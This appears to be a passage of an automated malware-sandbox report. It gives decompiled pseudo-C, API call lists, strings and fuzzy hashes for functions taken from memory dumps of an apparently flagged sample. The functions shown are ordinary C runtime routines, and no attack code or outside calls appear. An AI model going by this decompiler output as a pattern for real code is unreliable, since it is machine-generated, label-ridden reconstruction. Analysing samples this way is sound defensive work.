0x00419dac
0x00000000
0x00419dae
0x00419dae
0x00000000
0x00419dae
0x00419dac
0x00419d8f
0x00419d8f
0x00419d95
0x00000000
0x00419d97
0x00419d97
0x00419d9b
0x00419dcb
0x00419dcb
0x00419dd0
0x00419dd3
0x00419dd4
0x00419dd9
0x00419d9d
0x00419d9d
0x00419db3
0x00419db6
0x00419db7
0x00419dbc
0x00419dbc
0x00419d9b
0x00419d95
0x00419d8d
0x00419dc0
0x00419f37
0x00419f37
0x00419f37
0x00419e55
0x00419e55
0x00419e55
0x00419f58
0x00419f58
0x00419f5e
0x00419f62
0x00419f66
0x00419f6a
0x00419f6a
0x00419f3a
0x00419f46

APIs

_strcat.LIBCMT ref: 00419DB7
_strcat.LIBCMT ref: 00419DD4
___shr_12.LIBCMT ref: 00419E9D

Strings

1#INF, xrefs: 00419DAE
1#IND, xrefs: 00419D9D
1#QNAN, xrefs: 00419DCB
1#SNAN, xrefs: 00419D83
!wA, xrefs: 00419F3A
?, xrefs: 00419D34

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strcat$___shr_12
String ID: !wA$1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 1152255961-2505282180
Opcode ID: cf1903b3c016065074667d01c3798a35d0aa70355e17459d82669669377681d3
Instruction ID: c8b39d0b56393129c292276ed18ffee161f6f66a13c6bc643b0d9b82bd0db09f
Opcode Fuzzy Hash: cf1903b3c016065074667d01c3798a35d0aa70355e17459d82669669377681d3
Instruction Fuzzy Hash: 2C81D43180429ADEDF11CB68D8647EF7BB4AF12314F08459BD851DB2C2D3789A85C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 023EAE3A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 023EAEBB
_strcat.LIBCMT ref: 023EAED1
_strlen.LIBCMT ref: 023EAEE1
_strlen.LIBCMT ref: 023EAEF2
_strncpy.LIBCMT ref: 023EAF0C
_strlen.LIBCMT ref: 023EAF15
_strcat.LIBCMT ref: 023EAF31

Strings

Buffer overrun detected!, xrefs: 023EAE97, 023EAF2F
Unknown security failure detected!, xrefs: 023EAE81

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: _strlen$_strcat$FileModuleName_strncpy
String ID: Buffer overrun detected!$Unknown security failure detected!
API String ID: 3058806289-262988759
Opcode ID: 9c0a125e34a6107213809d73a944cb7a0560b7b11a2dda7d619c88b2a2654a73
Instruction ID: 726b8c2f8cc9156fa5ac8591dcec4c6e44d10bd41be8449fc433f70cb3cd1660
Opcode Fuzzy Hash: 9c0a125e34a6107213809d73a944cb7a0560b7b11a2dda7d619c88b2a2654a73
Instruction Fuzzy Hash: D631E572D016286BCF20AB608C41FDE366AAF14754F10406AF153A62D1EB78DA5D8F9B

Uniqueness

Uniqueness Score: -1.00%

Function 023E5A1D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00469BF8,00000060), ref: 023E5A3D
_fast_error_exit.LIBCMT ref: 023E5AF2
_fast_error_exit.LIBCMT ref: 023E5B03
GetCommandLineA.KERNEL32(?,00469BF8,00000060), ref: 023E5B22
GetStartupInfoA.KERNEL32(?), ref: 023E5B76
__wincmdln.LIBCMT ref: 023E5B7C

Strings

3y, xrefs: 023E5B28

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: _fast_error_exit$CommandInfoLineStartupVersion__wincmdln
String ID: 3y
API String ID: 3018315293-448672602
Opcode ID: ea1ec410c2f7158315da8c8b941c8ad01fbbc8a25a6755899e1b92cc3624a7d6
Instruction ID: d1ced744617db82ff3debc369b6f331253783646a8ce7f56cbfae1f82aba3bb4
Opcode Fuzzy Hash: ea1ec410c2f7158315da8c8b941c8ad01fbbc8a25a6755899e1b92cc3624a7d6
Instruction Fuzzy Hash: 2041F0B0D013358ADF31AB749C457AD77AAAF04718FA0443AE41AAB2C0EB748849CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0041A53C Relevance: 12.2, APIs: 8, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041A53C(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x46ac48);
				E004161C8(__ebx, __edi, __esi);
				_t54 =  *0x46c5a0; // 0xfb090c04
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E004146E0( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E00416320(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E00414310(_t82, 0, _t94 + _t94);
						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E00416C4A(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E004164E1(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E00416C4A(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E004164E1(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E00416203(E00417786(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}

0x0041a53c
0x0041a53c
0x0041a53e
0x0041a543
0x0041a548
0x0041a54d
0x0041a552
0x0041a555
0x0041a55b
0x0041a55d
0x0041a560
0x0041a563
0x0041a569
0x0041a6e2
0x00000000
0x0041a56f
0x0041a56f
0x0041a57e
0x0041a599
0x0041a599
0x0041a5a3
0x0041a5bf
0x0041a5a5
0x0041a5a8
0x0041a5b1
0x0041a5b6
0x0041a5b9
0x0041a5b9
0x0041a5aa
0x0041a5aa
0x0041a5aa
0x0041a5ba
0x0041a5ba
0x0041a5c5
0x0041a5e1
0x0041a5e1
0x0041a5ed
0x0041a5f2
0x0041a5f5
0x0041a5f7
0x0041a600
0x0041a608
0x0041a625
0x0041a627
0x0041a647
0x0041a654
0x0041a65a
0x0041a65c
0x0041a6e5
0x0041a6e5
0x0041a6e8
0x0041a6ea
0x0041a6eb
0x0041a6f0
0x0041a6f1
0x00000000
0x0041a6f1
0x0041a662
0x0041a665
0x0041a687
0x0041a68a
0x0041a6a2
0x0041a6a2
0x0041a6a3
0x0041a6a5
0x0041a6ac
0x0041a6af
0x0041a6b1
0x0041a6bd
0x0041a6c3
0x0041a6c5
0x0041a6d5
0x0041a6d9
0x0041a6de
0x0041a6de
0x0041a6c7
0x0041a6c7
0x0041a6ca
0x0041a6d0
0x0041a6d0
0x0041a6c5
0x00000000
0x0041a6b1
0x0041a69c
0x0041a69e
0x0041a6a0
0x00000000
0x00000000
0x00000000
0x0041a6a0
0x0041a675
0x0041a67b
0x0041a67d
0x0041a682
0x0041a682
0x00000000
0x0041a629
0x0041a629
0x0041a62a
0x0041a633
0x0041a637
0x0041a640
0x00000000
0x0041a640
0x00000000
0x0041a637
0x0041a5c7
0x0041a5d8
0x0041a5da
0x0041a5df
0x0041a639
0x0041a639
0x0041a6f4
0x0041a704
0x0041a704
0x00000000
0x0041a5df
0x0041a5c5

APIs

GetCPInfo.KERNEL32(00000000,?,0046AC48,00000038,004191FB,?,00000000,00000000,00416AC8,00000000,00000000,0046A9E0,0000001C,00416866,00000001,00000020), ref: 0041A57A
GetCPInfo.KERNEL32(00000000,00000001), ref: 0041A58D
_strlen.LIBCMT ref: 0041A5B1
MultiByteToWideChar.KERNEL32(00000000,00000001,00416AC8,?,00000000,00000000), ref: 0041A5D2

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID:
API String ID: 1335377746-0
Opcode ID: a7767d7dfff4f6244c2d61d9aa3cb251cdbf899d9cb6b3859c1cf73648cd1122
Instruction ID: 53873a6ec00620a61a2f4980110ddb5a0a5657fe8b4b79caf576cf54794538f6
Opcode Fuzzy Hash: a7767d7dfff4f6244c2d61d9aa3cb251cdbf899d9cb6b3859c1cf73648cd1122
Instruction Fuzzy Hash: F0516E70902218BFCF21DF65DC858DF7BB9EF44364F24411AF855A2250E7398DA1CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 00415DB5 Relevance: 12.1, APIs: 8, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00415DB5() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x46cdd0; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E00417CFF(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E004143A0(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E00417CFF(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E00416C4A(_t29, WideCharToMultiByte, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x46cdd0; // 0x1
					} else {
						_t7 = _t38;
						 *0x46cdd0 = _t7;
					}
					goto L6;
				} else {
					 *0x46cdd0 = 1;
					goto L7;
				}
			}

0x00415db7
0x00415dc6
0x00415dc8
0x00415dce
0x00415dcf
0x00415dfe
0x00415dfe
0x00415e01
0x00415e80
0x00415e82
0x00415e8c
0x00415e8c
0x00415e92
0x00415e94
0x00415e96
0x00415e88
0x00000000
0x00415e88
0x00415e98
0x00415e9a
0x00415ea6
0x00415ea9
0x00415eb1
0x00415eb3
0x00415eb6
0x00415ebf
0x00415eb8
0x00415eb8
0x00415eb8
0x00415ec8
0x00000000
0x00000000
0x00000000
0x00000000
0x00415e9c
0x00415e9c
0x00415e9c
0x00415e9c
0x00415e9d
0x00415e9d
0x00415ea1
0x00415ea2
0x00415ea2
0x00000000
0x00415e9c
0x00415e84
0x00415e86
0x00000000
0x00000000
0x00000000
0x00415e86
0x00415e03
0x00415e05
0x00415e0f
0x00415e12
0x00415e14
0x00415e24
0x00415e32
0x00415e37
0x00415e3d
0x00415e41
0x00415e44
0x00415e4c
0x00415e50
0x00415e5d
0x00415e5f
0x00415e61
0x00415e63
0x00415e67
0x00415e6d
0x00415e6d
0x00415e71
0x00415e71
0x00415e50
0x00415e76
0x00000000
0x00000000
0x00000000
0x00000000
0x00415e16
0x00415e16
0x00415e16
0x00415e16
0x00415e18
0x00415e1d
0x00415e1f
0x00000000
0x00415e16
0x00415e09
0x00415e0d
0x00000000
0x00000000
0x00000000
0x00415e0d
0x00415dd3
0x00415dd7
0x00415de5
0x00415deb
0x00415dee
0x00415df9
0x00415df0
0x00415df0
0x00415df2
0x00415df2
0x00000000
0x00415dd9
0x00415dd9
0x00000000
0x00415dd9

APIs

GetEnvironmentStringsW.KERNEL32(74CB4DE0,00000000,?,?,?,?,00414CCB,?,00469BF8,00000060), ref: 00415DD1
GetLastError.KERNEL32(?,?,?,?,00414CCB,?,00469BF8,00000060), ref: 00415DE5
GetEnvironmentStringsW.KERNEL32(74CB4DE0,00000000,?,?,?,?,00414CCB,?,00469BF8,00000060), ref: 00415E07
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74CB4DE0,00000000,?,?,?,?,00414CCB), ref: 00415E3B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00414CCB,?,00469BF8,00000060), ref: 00415E5D
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00414CCB,?,00469BF8,00000060), ref: 00415E76
GetEnvironmentStrings.KERNEL32(74CB4DE0,00000000,?,?,?,?,00414CCB,?,00469BF8,00000060), ref: 00415E8C
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415EC8

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
String ID:
API String ID: 883850110-0
Opcode ID: bb16f3fc901043dd4a39a90b54e6f2d5ce67b9d24119509b68d3f9c14091dc3d
Instruction ID: 311c58cef95d79db2d9db54e55ef80318bc01108663bc013f7fada5f1add2c1b
Opcode Fuzzy Hash: bb16f3fc901043dd4a39a90b54e6f2d5ce67b9d24119509b68d3f9c14091dc3d
Instruction Fuzzy Hash: F731EF72A04755EFD7202FB5AC888FBBA9CEBC5394B15093BF545C3200E7699DC482A9

Uniqueness

Uniqueness Score: -1.00%

Function 023EB3A3 Relevance: 9.2, APIs: 6, Instructions: 169COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 023EB418
MultiByteToWideChar.KERNEL32(00000000,00000001,023E792F,?,00000000,00000000), ref: 023EB439

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: ByteCharMultiWide_strlen
String ID:
API String ID: 550581524-0
Opcode ID: ababa95fbc2de825be00d8b81a26184a5ec8000cfc996ad7165c2fd1b1af597f
Instruction ID: 03491a3a683f9b9487efd4714b3f2a6e55303f7472f6b3b4288592644387361c
Opcode Fuzzy Hash: ababa95fbc2de825be00d8b81a26184a5ec8000cfc996ad7165c2fd1b1af597f
Instruction Fuzzy Hash: 31516D71900228EBCF229F95DC88DAEFBBAFF85358F204119F816A61D0D7319949CF60

Uniqueness

Uniqueness Score: -1.00%

Function 023E9EDF Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0046A9DC,00000001,?,0046A9E0,0000001C,023E76CD,00000001,00000020,00000100,?,00000000), ref: 023E9F03
GetLastError.KERNEL32 ref: 023E9F15
MultiByteToWideChar.KERNEL32(?,00000000,00000000,023E792F,00000000,00000000,0046A9E0,0000001C,023E76CD,00000001,00000020,00000100,?,00000000), ref: 023E9F77
MultiByteToWideChar.KERNEL32(?,00000001,00000000,023E792F,?,00000000), ref: 023E9FF5
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 023EA007

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: 2eb9b8cbde19e3c012b10d898068d61ae7ab7a5d1815d25182dd1f9f18f5e44e
Instruction ID: d82a8c64247100fedf76f81c69faf99ce6473c00a92600a6f95fca002fb3eb7d
Opcode Fuzzy Hash: 2eb9b8cbde19e3c012b10d898068d61ae7ab7a5d1815d25182dd1f9f18f5e44e
Instruction Fuzzy Hash: 27419B32800229ABCF229F60DC85BEE7B66FF09B60F144119F812A62D0D735CD59CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00419078 Relevance: 9.1, APIs: 6, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00419078(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x46a9e0);
				E004161C8(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x46cff4 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x46a9dc, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x46cff4 = 2;
						}
					} else {
						 *0x46cff4 = 1;
					}
				}
				_t42 =  *0x46cff4; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x46cfdc; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x46cfec; // 0x0
					}
					_t43 = E0041A4F9(_t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E00416C4A(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E0041A53C(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E00416203(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x46cfec; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E00416320(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E00414310(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E00416C4A(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E004164E1(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}

0x00419078
0x00419078
0x0041907a
0x0041907f
0x00419084
0x00419086
0x0041908c
0x004190a4
0x004190ae
0x004190b4
0x004190b7
0x004190b9
0x004190b9
0x004190a6
0x004190a6
0x004190a6
0x004190a4
0x004190c3
0x004190cb
0x004191bb
0x004191be
0x004191c0
0x004191c2
0x004191c2
0x004191c8
0x004191cb
0x004191cd
0x004191cf
0x004191cf
0x004191d6
0x004191dc
0x004191df
0x004191e5
0x004191e7
0x00419207
0x0041921a
0x0041921c
0x0041921e
0x00419220
0x00419221
0x00419226
0x00419227
0x00000000
0x00419227
0x004191e9
0x004191eb
0x004191f0
0x004191f1
0x004191f4
0x004191f5
0x004191fe
0x00419200
0x00419202
0x00000000
0x00000000
0x00419204
0x00000000
0x00000000
0x00000000
0x00000000
0x004190d9
0x004190dc
0x004191e1
0x004191e1
0x00419229
0x00419231
0x00419231
0x004190e2
0x004190e5
0x004190eb
0x004190ed
0x004190f2
0x004190f2
0x00419116
0x00419118
0x0041911d
0x00000000
0x00419123
0x00419123
0x00419127
0x00419132
0x00419137
0x0041913a
0x0041913c
0x00419143
0x0041914b
0x00419166
0x00419168
0x00419181
0x0041918e
0x00419196
0x004191a6
0x004191a6
0x004191a9
0x004191ad
0x004191af
0x004191b0
0x004191b5
0x004191b6
0x00000000
0x0041916a
0x0041916a
0x0041916b
0x00419174
0x00419178
0x00000000
0x00000000
0x0041917a
0x00000000
0x0041917a
0x00419168
0x0041911d

APIs

GetStringTypeW.KERNEL32(00000001,0046A9DC,00000001,?,0046A9E0,0000001C,00416866,00000001,00000020,00000100,?,00000000), ref: 0041909C
GetLastError.KERNEL32 ref: 004190AE
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00416AC8,00000000,00000000,0046A9E0,0000001C,00416866,00000001,00000020,00000100,?,00000000), ref: 00419110
MultiByteToWideChar.KERNEL32(?,00000001,00000000,00416AC8,?,00000000), ref: 0041918E
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004191A0

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: 79c7eff7fa83c757d500b32c447e92462afab17e46bc91e82cd89ae59d7b95a8
Instruction ID: 52909cc6f779daf940d6f52735d5db3013f8925af0f5ca2cbe9353adca3fdc3d
Opcode Fuzzy Hash: 79c7eff7fa83c757d500b32c447e92462afab17e46bc91e82cd89ae59d7b95a8
Instruction Fuzzy Hash: BC419E3190121ABBDB229F54DC49AEF3B75FB08760F24451AFC10A6290DB398DD1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 023D31FE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 023D30FC: RtlAllocateHeap.NTDLL(?,00000008,0004B000), ref: 023D310C

RtlAllocateHeap.NTDLL(?,00000008,0000000F), ref: 023D3252
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 023D32D0
HeapFree.KERNEL32(?,00000000,00000000), ref: 023D332A
HeapFree.KERNEL32(?,00000000,0000000F), ref: 023D333A

Strings

Roland GS Sound Set/Microsoft (P) 1996 Roland Corporation, xrefs: 023D3241

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Free
String ID: Roland GS Sound Set/Microsoft (P) 1996 Roland Corporation
API String ID: 4277724868-2110447102
Opcode ID: f134d59b8ff788eb7deb2f764825c815c6005afc875f5a3b62cb5a5e90dd5e44
Instruction ID: 62afb46ff8ee4fedc1e6835849c405d39cdf6b871aeb7fca7ff9b919d1859eeb
Opcode Fuzzy Hash: f134d59b8ff788eb7deb2f764825c815c6005afc875f5a3b62cb5a5e90dd5e44
Instruction Fuzzy Hash: 54517C72900209EFCF20CF54D984B9ABBF8FF04314F1484A9E9499B291DB30E995CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004155A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004155A8(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}

0x004155ad
0x004155b5
0x004155bd
0x004155c5
0x004155cb
0x004155cb
0x004155c5
0x004155d1

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,00415716,?,00469CD0,00000008,0041574D,?,00000001,00000000,0041A11A,00000003), ref: 004155AD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004155BD
ExitProcess.KERNEL32 ref: 004155D1

Strings

CorExitProcess, xrefs: 004155B7
mscoree.dll, xrefs: 004155A8

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: d9115736d2b6ae87ba92d7a6ca6d7966deaa8301589dcb7d5a07154a4003e413
Instruction ID: d99f269bc0d8fdba04c04ce083382a1d8da04f584f4bb0eccd205e8e783ce873
